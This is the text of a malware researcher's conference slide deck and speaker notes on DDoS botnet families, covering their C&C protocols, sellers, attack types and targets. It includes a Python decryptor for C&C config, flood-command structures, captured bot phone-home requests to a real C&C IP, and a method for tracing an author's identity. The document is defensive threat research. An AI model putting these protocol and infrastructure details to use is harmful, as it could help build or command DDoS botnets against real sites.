3. 3
Agenda
• Who am I
• What is Mcorral
• Quick DDoS Overview
• Malwares
– Life and Death of a DDoS Malware
– "The APT"
– Give 'Em the Boot
– A Business of Ferrets
– The "Hack Forums" Bot
– A Lion, a Snake, and a Goat
– The Accidental APT
• Trends and Takeaways
4. 4
Who am I
• Dennis Schwarz
– Security Research Analyst on Arbor Networks’
ASERT
– Formerly an intrusion analyst with Dell
Secureworks
5. 5
Mcorral == Malware Corral
• ASERT’s malware collection, storage, and
processing system
• Second generation
• Developed in-house with dedicated dev-team
– Hi jedwards
• Configured by analysts for analysts
40. C&C – Obfuscation
40
def decrypt(msg):
# xor key is stored in a 126 element array of words.
# each element is assigned manually.
key =
[3,2,5,8,5,1,2,3,2,5,3,4,1,2,4,3,5,8,2,4,5,8,1,2,4,3,1,1,8,1,2,4,3,1,1,5,2,2,1,2,1,3,5,2,2,1,2,1
,3,3,1,2,3,5,2,6,2,4,1,3,2,1,2,6,2,3,3,2,1,1,3,6,2,1,2,4,4,3,1,2,3,5,2,6,3,1,2,3,5,2,6,5,2,2,1,2
,1,2,6,2,3,3,2,1,1,5,2,2,1,2,1,2,3,2,5,3,4,1,2,2,3,1,2,3,5,2]
assert len(key) == 126
plain = []
for i in range(len(msg)):
plain_byte = ord(msg[i]) ^ key[i % len(key)]
plain.append(chr(plain_byte))
return "".join(plain)
44. C&C – Response (516-byte)
struct {
int command;
struct params params;
char padding[76];
}
struct params {
char target_host[400];
short target_port;
short padding;
int flood_time_in_secs;
int delay_in_ms;
int number_of_threads;
int sub_command;
int field_1A4;
int rand_source_ip_bool;
int payload_size;
int field_1B0;
}
44
45. C&C – Response (1028-byte)
struct {
int command = 0x77;
struct params params;
char padding[324];
}
struct params {
char query_name[100];
int flood_time_in_secs;
int delay_in_ms;
int number_of_threads;
int source_ip[32];
int set_query_name;
int set_rand_ip;
int set_source_ip;
int num_dns_servers;
char dns_server_0[30];
...
char dns_server_17[30];
}
45
46. Attack Types
• 0x88, 0x1 – TCP SYN flood
• 0x88, 0x2 – “big” TCP SYN flood
• 0x88, 0x3 – “big” TCP SYN flood (duplicate)
• 0x88, 0x4 – UDP flood
• 0x88, 0x5 – ICMP echo request flood
• 0x77 – DNS server flood or DNS amplification
attack
46
69. 69
Interview – Snippets
• On distribution of malware/exploit kits
– 20:17:21 AreYouAreDo: exploits are very expensive
• On advertising of booter service
– 20:19:45 AreYouAreDo: google
• On how he got started in DDoS
– 20:28:47 AreYouAreDo: well, image poor guy or people in so poor, corrupted country
like russia or ukraine. annoying bad job, money is tight. and a lot of ambition)
• On how much money he makes
– 20:31:52 AreYouAreDo: how much money? hmm much much better than regular job
• On hacking sites
– 20:41:55 AreYouAreDo: xss. sql.
70. 70
Interview – Snippets
• On his customers and their attacks
– 20:34:41 AreYouAreDo: sometimes there is some job from police =)
– 20:37:44 AreYouAreDo: web-shops, political, games etc.
• On handling money
– 20:40:01 AreYouAreDo: well , ill say not clear true, but enough to
understand. online game currencyies
– 20:40:53 AreYouAreDo: bitcoin is not popular for russian customers
• On anti-DDoS companies
– 20:53:01 AreYouAreDo: that might be interesting from [for] you that mant
[many] anti-ddos companies was or still selling ddos services =)
71. 71
Interview – Snippets
• On his customers and their attacks
– 20:34:41 AreYouAreDo: sometimes there is some job from police =)
– 20:37:44 AreYouAreDo: web-shops, political, games etc.
• On handling money
– 20:40:01 AreYouAreDo: well , ill say not clear true, but enough to
understand. online game currencyies
– 20:40:53 AreYouAreDo: bitcoin is not popular for russian customers
• On anti-DDoS companies
– 20:53:01 AreYouAreDo: that might be interesting from [for] you that mant
[many] anti-ddos companies was or still selling ddos services =)
86. C&C – Phone Home
86
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==
&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=
m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h
7m 28s
87. C&C – Fake Phone Home
87
POST /SpC/wowcab.php HTTP/1.0
Host: anyve.org
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_1; pl-PL)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2
Safari/537.36
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://moneydo.nl
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
m=CA==&h=CQAJAA4IDAgACwkPDQ8ACggOCQsJCwwJCw0JDQgI
&p=cndwdhVoexhjdnlsZRgIXAhQCQpV&v=ChYKDBhta3k=&s=D0AAD
hhtGA==
88. C&C – Phone Home Response
88
HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8
dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN
Mozilla Gecko Firefox 25
89. C&C – User Agents
• Mozilla Gecko Firefox 25
• Mozilla compatible (Apple webKit 6)
• Mozilla Gecko 5.0 Firefox
• Mozilla Gecko 1.664
• Mozilla Gecko 123
• Mozilla Gecko 4.0 compatible
• Mozilla Gecko 112
• Mozilla Gecko
89
106. 106
Author – Poor OPSEC
1. Posted Steam username on Hack Forums
thread
2. Steam Profile linked to gaming site
3. Gaming site linked to Etsy shop
4. Etsy links to real
name, location, age, pictures, twitter, etc.
107. 107
C&C
• IRC
• Nickname: UGSec[US|W7|x86|1c]rmryazr24v
– Country code (provided by
http://freegeoip.net/xml/)
– Windows version
– Architecture
– Number of processors
– 10 random lowercase alphanumeric characters
143. Attack Types in the Wild
143
http_post
12%
slowloris
19%
tcp_connect
0%
http_get
57%
arme
0%
udp
2%
rudy
0%
tcp_syn
0% icmp
0%
other
7%
tcp
3%
http_post
slowloris
tcp_connect
http_get
arme
udp
rudy
tcp_syn
icmp
other
tcp
144. • Copy and paste culture
• Lots of broken implementations
• Too many flood types
• DNS amplifications attacks are starting to be
integrated into bots
144
Miscellaneous
145. • Copy and paste culture
• Lots of broken implementations
• Too many flood types
• DNS amplifications attacks are starting to be
integrated into bots
145
Miscellaneous
Good morning, today I’m going to share some research from ASERT’s DDoS Malware Corral.ASERT is Arbor Network’s malware research teamAnd this presentation is our second “state of the union of DDoS malware”, if you will.If interested, the slides for our first volume, presented last year, can be found online under the same title.
This is what I’ll be covering. First, who I amSecond, what is mcorralFollowed by a really quick primer on DDoS so that we’re on the same pageThen, I’ll get into the details of the malwaresAnd I’ll finish with some trends and takeaways
My name is Dennis Schwarzand I’m a malware researcher.
What is mcorral ?Mcorral is our malware collection, storage, and processing system.We’re on our second generation now and started transitioning to it in the middle of 2013.The first generation system definitely served its purpose, but we decided to take the best features of it and re-implement it as a much more dynamic and configurable platform.We also have a dedicated dev-team now to keep up with the researchers “wish lists”. This allows researchers to focus on malware instead of taking time off to implement a new feature
Metaphoricallymcorral looks like thisLike a bunch of horses in a horse corral
Visually, it looks like this.This is a screenshot of part of the researcher’s primary user interface
And, logically it looks like thisMalware comes inIt’s prioritized and ran through our sandboxenThe results are post-processed and organizedAnd finally, out comes (hopefully) actionable items for various consumers
After mcorral and the researchers do their business, we get DDoS malwareHere’s a samplingWe actually get much more than just DDoS related malware, but for now we’ll gloss over thathttp://worditout.com
Before getting into the malware, I wanted to give a real quick overview of DDoSThe attacks on this slide are what I would consider the “basic suite” of attacksThey pretty much do what they sayImplementation-wise,TCP syn floods are usually implemented as Connect floods. This is due to the ease of calling the Connect function and restrictions on raw sockets in WindowsAnd the HTTP attacks are differentiated by their headers and header content
These are what I would consider the “Layer 7” suite.Slowlorisopens several web sessions to the target and holds them open for as long as possible, dribbling out bytesARME or Apache Remote Memory Exhaustion or Apache Killer, sends a crazy Range header that mucks up older version of ApacheRUDY or R-U-Dead-Yet sends an endless stream of POST dataAnd DNS refers to DNS protocol aware attacks
Another suite of attacks are the reflection and amplification attacks. Here are some of the common services that allow for thisThe port 19 chargen service is the grandfather of amplification attacksDNS amplification, of course, took down Spamhaus in early 2013 to a lot of pressAnd NTP amplification has been in the spot light recently: the January attack on major gaming networks and the February attack being pegged as the largest Internet DDoS attack seen so farSNMP has a few amplification/reflection avenues as well, so it wouldn’t surprise me if it’s the next big news maker…
Every DDoS talk needs to mention “booter” sites, so here that slid.This is a screenshot of twbooter, the service used to take down Brain Kreb’s website in early 2013 and was followed by a “swatting” attack on his houseThese types of booter sites are everywhere and have been around for a long timeThey are used a lot in the gaming worlds to boot off other gamersand also used between conflicting/competing booter sites, hacking forums, and other hacking “clicks”
Now, on to the malware. Why did I choose to share the following families?First, DDoS is Arbor Network’s bread and butter so I spend a good deal of my time on DDoS malware.Second, part of the post-processing/output done by mcorral bubbles up potentially new and interesting samples for humans to look at, so a lot of these came from that pileThird, these families are certainly less well known than for example Brobot, Dirtjumper, etc.But, with that, most of the associated campaigns are smaller and that allows me to get a more complete picture of themThese families were also mostly active in the wild when I start looking at them which is always a nice benefit.Lastly, these are some of the malware families that I’ve personally reverse engineered and tracked so they’re a bit like my pet malware
First up on my list is Trojan.BlackRev.I wrote about this family in a blog post released last year, but I wanted to talked about it here because it shows what I consider a complete life cycle of a malware family
It was born circa March 2013
It is Russian in origin. This isn’t a big surprise as Russia is a major DDoS playerSource: http://en.wikipedia.org/wiki/File:Russian_Federation_(orthographic_projection).svg
It’s written in DelphiAlso not a big surprise as Russian malware coders love DelphiI have a personal theory that either Russian computer science programs are still teaching Delphi programming, or that’s what the language of choice was when the current generation of Russian DDoS coders were going through school.
I got its name from a mutex that it creates on an infected systemHere’s an IDA screenshot of that code
It’s full name is actually “Black Revolution” as can been seen in this panel screenshotThis panel isn’t very fancy, just basic and to the point.
Some of the forums thatblackrev was being advertised in was:Shopworld.biz – a Russian language forumAndElite hack forums – an English language forumHere is the advert for the latter
Pricing was in WebMoney’s WMZ currency. WMZ is WebMoney’s USD equivalentSo selling for a few hundred dollars
The author was someone going by the handle “silence’.Here is a thread on shopworld.biz where he claims blackrev as his own.When I was originally looking at blackrev, there wasn’t much attribution on silence besides an ICQ number.
But, following up for this talk… it looks like in December 2013 silence upset somebody and they decided to “dox” him.Take it with a grain of salt though… it’s as accurate as any other “doxing”
On to the C&C.This is what blackrev’s C&C phone home looks like on the wireA standard HTTP GET based C&C protocol.These types of protocols are great because it’s easy to do a inurl search for new C&C hosts
This is what the command polling looks like
Here are the attack related commands. There are certainly a bunch of them.These are all from the basic suite of DDoS attacksHTTP floodsTCP floodsUDP floodsEtc.
During it’s lifetime, I was able to track 6 distinct C&C hostsHere they are on a google map@NO_UPDATE
Here are the attack commands sent from these C&CsAn HTTP GET flood was the most popular@NO_UPDATEmalware=> \o blackrev_cmdsmalware=> select cmd from ddos_commands where cc_channel='blackrev';malware=> \ocut -d "|" -f 1 blackrev_cmds | sort | uniq -c | sort -nr
These were the targeted countries based on geo IP.Russia and the UK being the most targeted@NO_UPDATEselect target_cc, count(*) from ddos_commands where cc_channel='blackrev' group by target_cc order by count(*) desc;
And these were some of the targets observedThese sites resolve into the following categories:PornCompeting DDoS/booter servicesHacking sitesDrug marketplaceScripting siteAd siteConstruction companyCarding forum@NO_UPDATEWorditout.com
As mentioned at the start, this is the life cycle of blackrevSo circa June 2013 about 3 months after its release, silence decided to sell the projectAnd this effectively kills off blackrev as we haven’t seen any new samples since.
To further validate it’s death, in October 2013, someone leaked it’s source code on a public forum.I want to say this is the “fuckav” forum, but I’m not 100% sure on that.Google translate wasn’t doing a great job with this URL, but it essentially says “blackrev source code”
Just to verify, I downloaded the leaked codeAnd tracked down the CreateMutex function in the Delphi code that we saw earlier in the IDA screenshotSo far, I haven’t come across any blackrev code forks or variantsThat was the life and death of Trojan.Blackrev
Next up is the “The APT” or Trojan.UUTab
UUtab was first seen circa May 2013
I of course say “APT” because it is Chinese in origin.Chinese DDoS bots aren’t a big surprise as China is also a major DDoS playerSource: http://en.wikipedia.org/wiki/File:People%27s_Republic_of_China_(orthographic_projection).svg
It is written in C++
AndIt’s name comes from a piece of its C&C phone home. The “magic number” if you will.This is an IDA screenshot of the “send phone home” function and we can see the Uutab in the middle strcpy call
The C&C host details are obfuscated in the binary using an XOR with a 126 digit hardcoded keyThis Python function can be used to decrypt it
This IDA screenshot shows the decryption in action
The C&C protocol is what we call a binstruct.Binstruct is essentially a C structure with a mixture of ASCII and binary data members and a fixed length sent over the wireUutab comes in a 516 or a 1028 byte flavorThis slide shows the former.
This is what thebinstruct looks like on the wire
This is what the 516 byte C&C response looks likeAgain a binstruct.The paramsstruct defines the DDoS target host, port, timing, number of threads, etc.
And here is the 1028 byte versionWhat they added in this version is the ability to specify up to 18 DNS serversWhich allows for some DNS attacks
Here are the full set of attack commands, again mostly comprised of the basic suiteIn addition, there are 2 DNS related attacks – An A query flood on a server and a DNS amplification attack using up to 18 open DNS resolversThis one is very interesting to me as it was the first botnet in the wild that I’ve seen to support a distinc DNS amplification attack command.That’s not to say that DNS amplification hasn’t been around forever.. It has, but mostly in the form of standalone scripts and a list of open DNS resolvers
I’ve been tracking close to 170 Uutab C&Cs since May and had only seen 1 attack come through. It was an attack on an IP in China.So I was thinking that maybe there was a bug in monitoring code (very possible), or that these C&Cs just die really quickly and the samples were old by the time they got to mcorral., or maybe they’re doing some kind of geoblocking/tor blocking.But last night interestingly enough, doing one last check before giving my talk this morning, I saw a second attack come through. On a Chinese mortgage/loan company.Very timely So my new theory is that Uutab campaigns are possibly using very small and short attack windows. @NO_UPDATEpython src/get_lat_long_by_tag.py uutab > uutab.csv
I’m still monitoring this family and it was last seen Circa February 2014.@UPDATE
Next up, “Give em the boot” or Trojan.AyabotTo give credit, the Sonicwall folks and the myexperimentswithmalware blog released their analysis on Ayabot first, but I just failed to find it at the time. These slides are based on my own research though.
Aya is an acronym for a hacker (or possibly a hacking group) known as AreYouAreDo.
First seen circa May 2013
Another Russian botSource: http://en.wikipedia.org/wiki/File:Russian_Federation_(orthographic_projection).svg
And of course it’s written in Delphi
Instead ofselling a malware or botnetAreYouAreDo uses the Ayabot botnet to support a booter site and sells a DDoSing serviceThis is a translated screenshot of the booter site showing its marketing and pricingIt’s interesting to note that they also sell/resell an anti-DDoSing service (the last section of the black box)
Ayabot uses a multi staged C&C protocol over HTTPThe first stage is an optional C&C redirection featureYou sould be able to see the redirect here in this Wireshark screenshotBut it looks like they are trying to foil us with some secure base64 encoding
It actually turns out to be triple-base64 ! So, very secure indeed.Once decoded, we can see the second stage C&C URL
The second stage is a ping
This is the cleaned up version of the ping query and responseIt returns a hash.The hash is checked against a hardcoded value in the binary, this seems to be an client side authentication mechanism or checksum
Next up is the bot registration
Again, the query and response cleaned up.The registration is a standard phone home with computer name, CPU, memory, Windows version, etc.The response is an id number
And finally, command polling
Here it is cleaned up.The query sends the id it got from registration, bot name, bot version, and an unknown fieldAnd the bot command is returned.
The attack types are again from the basic suite.I assure you that there are plenty of DDoS bots that implement more than just the basic suite of attacks. We should get to one here in a few minutes…
These are the C&Cs I’m tracking, kind of all over the place. I believe these are a mixture of bullet proof hosted sites and hacked sites as some of the C&Cs have been alive and active since the start and some have died quicklyI would say the former sites use the redirection optionAnd they redirect to the short lived, hacked sites that provide the bot commands@NO_UPDATEpython src/get_at_long_by_tag.py ayabot > ayabot.csv
Here are the attack commands seen from them.@NO_UPDATE\o ayabotselect cmd from ddos_commands where cc_channel=’ayabot’;\ocut -d '|' -f 1 ayabot | sort | uniq -c | sort -nr
The countries targeted based on Geo IP.Russia and Romania are on top@NO_UPDATEselect target_cc, count(*) from ddos_commands where cc_channel='ayabot' group by target_cc order by count(*) desc;
And some of the observed targets.Picture blogNewspaperNews blogPizza/Sushi restaurantChildren’s clothing manufacturerBuilding materials companyAnti corruption website@NO_UPDATEselect target_host, count(*) from ddos_commands where cc_channel='blackrev' group by target_host order by count(*) desc;
While googling around for this bot and campaign, I stumbled across this link which was a chat system.Surprisingly someone joined and I was able to have a impromptu interview with AreYouAreDo.Vasilis Zebedee was the name that the TOR browser filled in for me, so that’s me typing.
Here are some snippets that I found interesting:On distribtionBased on this, I’m guessing he does not distribute via exploit kitsOn advertisingGoogle adwords I assumeOn how he got startedOn how much money he makesOn hacking
At this point he wanted to start trading for information. He wanted me to provide him with other Russian botnet C&Cs so that he could take them over… because you know he’s elite.This also makes sense why he implements a client side authentication into Ayabot, maybe to prevent some from taking over his botnet.
On customers and attacks – I suppose this goes along with the corrupt countries he mentionedOn handling money – unsure what gamesAnd I believe Russia just recently banned bitcoin…And finally on Anti-DDoS companiesHe told me about 1 company which I looked up. They do look like a legit anti-DDoS company, but who knows if they really sell a booter service as well.At this point he wanted to start trading for information. He wanted me to provide him with other Russian botnet C&Cs so that he could take them over… because you know he’s elite.Also makes sense why he implements a client side authentication in Ayabot, to prevent someone taking over his bot.
Attack-wise, this this botnet has slowed down a bit recently, but I continue to monitor this bot and it was last seen circa February 2014
My fourth bot is Trojan.FerretI wrote a blog on this family a few weeks ago, but wanted to talk about it here to provide some updates.
This was first seen circa November 2013.It came on my radar from this tweet by @malpush.
Russian in origin
And of course, Delphi.
This is Ferret bot’s panel login.The ferret icon and theme cracked me up.It also reminded me of a French DDoS bot I was trying to track down…
Called Angry Cat.but, I never was able to find a binary sample of Angry Cat, so Ferret was a suitable replacement If anyone does have a sample of Angry Cat, I’d love a copy.
Here is the statistics page. Based on some comments from a thread on the kernelmode forum, the Ferret panel is based on another bot’s panel called N0pe… I took a quick look at N0pe and it does look like the panel is similar, but the bot itself differs from Ferret, I believe it was written in C# and not DelphiThis campaign has close to 2500 bots, so not large, but not small either.
Here’s a sampling of the bot list.As you can see from the flag icons, it’s gotten around…
Ferret is actively being development.Since it was discovered I’ve seen 4 versions.
It’s actively being distributed by the Trojan Downloader networksIn early February I started seeing an Andromeda botnet dropping it. On a cursory look this came was also dropping Dirtjumper samples, so maybe a DDoS focused trojan dropper network…I haven’t had the opportunity to explore this relationship further, so if anybody is currently tracking Andromeda, I’d love to chat
Ferret uses 2 encryption routines, one for C&C communication and one for stringsThis Python function decrypts the C&C comms and it’s a combination of base64 and XOR.Over the course ofdevelopment they’ve continue to use the same XOR key, the number 8. So that’s been thoughtful of them.
This Python function decrypts the strings and it is again a combination of base64 and XORLikewise, over the development, they used the following 2 keys for strings encryption.
There is an exception to their key reuse rule. The key used to encode the C&C host details has been uniqueHere is a sampling from a handful of samplesBased on the format it is likely generated from some sort of base64 based builder or keygen.
Here’s what the C&C phone home looks like.It is an HTTP POST based C&C.The POST data contains standard phone home data. The “m” field contains the message type, and 0 is for “phone home”.
An interesting feature of Ferret is if it detects it is running in a VM, being debugged, or messed with in other ways, it generates a fake phone home.The POST content will be legit, but the host, URL and User-Agent will be fake.The fake domains may make for a interesting sinkhole opportunity, but I haven’t explored that yet.
Speaking ofUser-Agents, it is used as some form of an authentication method.As can be seen here, the phone home response is the User-Agent sent in the original request.
Here is a sampling of User-AgentsMozilla Gecko is pretty consistent and further indicates there is likely a builder in play or they just like the Gecko UA
Message type 1 is for command polling
This is what a command looks like. The fields are delimited by ‘*’s and indicate port, timing, etc.
Attack types are again from the basic suite.HTTP floodsUDP floodsTCP floods
These are the C&C locations I’m tracking.
Most of the attacks I’ve seen from these C&Cs have been HTTP floods. For awhile it was just httpfloods, but recently started seeing a udp and tcp flood in the mix@NO_UPDATEmalware=> \o ferretmalware=> select cmd from ddos_commands where cc_channel=’ferret';malware=> \ocut -d “*" -f 1 ferret | sort | uniq -c | sort -nr
Targeted countries based on geo IP: Germany and Russia are on top@NO_UPDATE
Here’s a sampling of targets.Here we have:Vice President of Panama – Juan Carlos VarelaElectronics companyWedding dress storeWatch storeReal estate sitesPolitical news blogsMoney exchangerCarding forumGaming site
Ferret continues to be active, I last saw it on February 15, 2014.@UPDATE
Trojan.UGSec is the obligatory Hack forums botWhile a lot of researchers think themselves as above researching Hack Forum malware,I find it interesting because:There is a lot of activity thereIt does occasionally produce significant threats, for example, I’d argue Betabot is an exampleAnd Malware in general tends to trickle down there
First seen mid 2013.
From the UShttp://en.wikipedia.org/wiki/File:USA_orthographic.svg
And it’s written in C++
Here is the Hack Forums advert
Pretty professional looking…
And the pricing.30-50 dollars.I didn’t look very closely, but there might be an interesting bitcoin money trail from UGSec’s author. The sales thread had a lot of “vouches” and likely many purchases.
Speaking of the author, he goes by the handle “Bionic”He’s very active on Hack Forums, 1100+ posts as can be seen in his profile
As is sort of par for the course for Hack Forums though, he practices poor OPSEC and I was able to track him down in a few minutesThat’s another nice thing about HF, it tends to be fairly easy to find malware/campaign attribution details.
The main reason I wanted to profile this bot, is to show that in the DDoS malware sub-culture, IRC is still very common.Even in 2014.
Attack types.Chargen here does not refer to the port 19 service, but just a payload of random characters.
The samp command is interesting because instead of just being a TCP or UDP flood on the gaming port it actually tries to implement the Grand Theft Auto protocol
I haven’t seen much from this bot since August.
My second to last malware is Trojan.Chimera
First seen in July of last year
I believe it is Bulgarian in originhttp://upload.wikimedia.org/wikipedia/commons/thumb/e/e9/EU-Bulgaria.svg/500px-EU-Bulgaria.svg.png
This is based on the language detect by Google translate on Chimera’s login screen.This translates to “authorization”.
It is written in C++
Naming wise, its name comes from the embedded program database pathname.These PDB strings are great. While I know some folks/vendors disagree, I prefer to name malware their given name when possible. It makes classifying and comparing research far easier
Some of Chimera’s source code, or at least what it was based on, can be found on pastebin. This paste just shows some skeleton code though.This was posted circa November 2013.
Like a few of the other bots, Chimera uses an optional C&C redirection feature. This time using ICQ. Here is an example profile with the second stage C&C URL embedded in the About me field.
It uses a standard HTTP GET based command poll.
And this is what a response looks. Which is a very nicely detailed XML-like file.The text outside of the tags are documentation notes that aren’t parsed in the bot, but helpful nonetheless
Here are the attack types. You’ll note that this bot has an attack from the Layer 7 suite, as promised earlier ;)A nice slowloris attack
I’m tracking just a handful of C&CsTo be honest, I have just recently started monitoring Chimera, so I don’t have too much data yet.
So far I’ve only seen slowloris attacks.
The attacks have been against a few targets in the uSselect target_cc,count(*) from ddos_commands where cc_channel='chimera' group by target_cc;
And here’s they are.Most of the attacks have been against this porn siteselect target_host,count(*) from ddos_commands where cc_channel='chimera' group by target_host;
Chimera is still somewhat active. I last saw it in February
As I mentioned earlier, mcorral bubbles up potentially new and interesting DDoS malware samples for further human analysis.Sometimes the automatic heuristics get it wrong and a sample turns out to be more than DDoS
Usually a strings hit like the above that isn’t already classified as an existing malware family is a good indicator of a new DDoS bot
But in this case it turned out to be a new (to me and my network of researchers at least) Chinese RAT with no DDoS capabilities.I’ve dubbed it as Zuguo and even though it’s not DDoS related I wanted to take a few slides to present my research to see if anyone here at DCC was familiar with itSIMPLE_DDOS turned out to be the C&C communications crypto key.
Zuguo uses a multi staged C&C protocol.The first stage is an optional redirection where it looks for URLs on a webpage tagged with a “zuguo” sentinel.If found, it strips this part and connects to the host/port over a persistent TCP connection.So far, I’ve only found 2 of these redirects, both have been sina.com.cn blogs, and both pointing back at the same IP.And I’ve only be able to track down 1 second stage C&C, this 222 IP
The second stage C&C is encrypted with Blowfish using the SIMPLE_DDOS key and LZO compressionAnd once decrypted, the phone home is fairly standard.
The last 4 fields of the Phone home come from Zuguo’s configuration which is stored in the registry.They are the Remark, Group, PassWord, and Version valuesThis screenshot shows the complete configuration. The base64 encoded Config value contains the stage 1 and stage 2 C&C addresses.
Pivoting from this solo stage 2 C&C IP got me to Trojan.DrAgOn.Here’s what DrAgOn looks like on the wire.
It may look familiar to some of you, as it is a Gh0st RAT variant.It uses the standard Gh0st RAT C&C binstruct protocol with zlib compression.Here is some quick Python that cleans it some.
This is what it looks like decompressed.
Pivoting from Trojan.DrAgOn got me to FireEye’sSunshop campaign
Another link between Zuguo and Sunshop is the use of signed binaries.Here’s Zuguo’s valid certificate issued to a company I can’t pronounceWhile this certificate wasn’t listed in FireEye’s report on Sunshop, they did indicate that using signed binaries is one of Sunshop’s MOsAnd that’s where my trail got more or less cold. Hoping someone has some further insight on either Zuguo or DrAgOn and if you do, please reach out.
Finishing up, these are some personal trend and takeaway thoughts.Mostly based on empirical evidence.
This is a breakdown of languages we see in DDoS malwareRoughly from most to leastAs mentioned a few times in this talk, Delphi usually means RussiansBrobot put PHP on the DDoS malware mapBut pastebin and other similar sites are flooded with various Perl, PHP, and Python DDoS bot scripts.Java isn’t particularly popular in the DDoS world, my first run in was actually a few weeks ago trying to tracking down Kaspersky’s un-named Trojan.jbot variant they blogged about at the end of January
As an aside on Visual basicReversing it sucks and I hate it.If you’ve reversed VB, I trust you feel my pain
This is a review of the C&C types we seeI think I covered most of these with the bots presented.Unfortunately, I don’t have stats on what the distribution among these are, but if I had to guess:HTTP: 40%Binstruct: 20%IRC: 20%ASCII: 20%
These are the types of crypto we see.In general, DDoS malware does not use strong crypto.Again, I don’t have stats, but XOR based obfuscation is definitely the most common and can almost be assumed to be the default
While I think most of the bots I presented on in this talk implemented attacks from the basic suite of DDoS attacksI did want to show that the more advanced attacks are used in wildThis is a chart from our monitoring system across all monitored DDoS botnet families, showing (manually normalized) attack command dataAs can be seen, Slowloris, Rudy, etc. are indeed used in the wild, but albeit not as much as the generic HTTP floods.The “Other” categoryincludes unknown commands, other IP protocols, combo attacks, and “smart” (redirect following/cookie parsing) HTTP attacks that try to bypass some anti-ddos countermeasures.
Some final miscellaneous thoughts on DDoS malware:It’s a copy and paste culture. A lot of copying and pasting going on, especially in the Chinese variants. This can make it extremely difficult to categorize some families. I have a theory that Chinese computer science programs require students to create their own Gh0st RAT variant as a senior project or something.Lots of broken attack implementations. For example, most implementations of slowloris aren’t slow at all and turn into a normal HTTP floodI feel like a lot of the bot families try to implement too many attacks. It’s not uncommon to see multiple UDP floods, multiple TCP floods, etc. where 1 of each would likely do.DNS amplification are slowly making their way into DDoS malware. As mentioned earlier, most DNS amplification attacks are executed with a standalone script and a list of open resolvers.With it’s current popularity, I assume we’ll start see the same integration with NTP amplification.This reminds me of a comment a collegue, Jeff Edwards, made. When the Slowloris and Apache Killer research and proof of concept code become public, there was definitely a noticeable delay before we started seeing those attack implemented in botnet malware. I think we’re seeing something similar here with the amplification attacks, but instead of new research, the catalyst is how much press these attacks are creating…
DNS amplification attacks are slowly making their way into DDoS botnets. As mentioned earlier, most DNS amplification attacks don’t really need the support of a botnet but we’re slowly seeing them integrated.With it’s current popularity, I assume we’ll start see the same integration with NTP amplification.The above 2 points remind me of a comment a collegue, Jeff Edwards, made. When the Slowloris and Apache Killer research and proof of concept code became public, there was definitely a noticeable delay before we started seeing those attacks being implemented in botnets. Even when they started implementing them, they were fairly broken and didn’t really work. I think we’re seeing something similar here with the amplification attacks, but instead of new research, the catalyst is how much press these attacks can generate
And that’s what I have for you. If you have any questions, comments, or feedback, I’m available.Thanks much for listening!
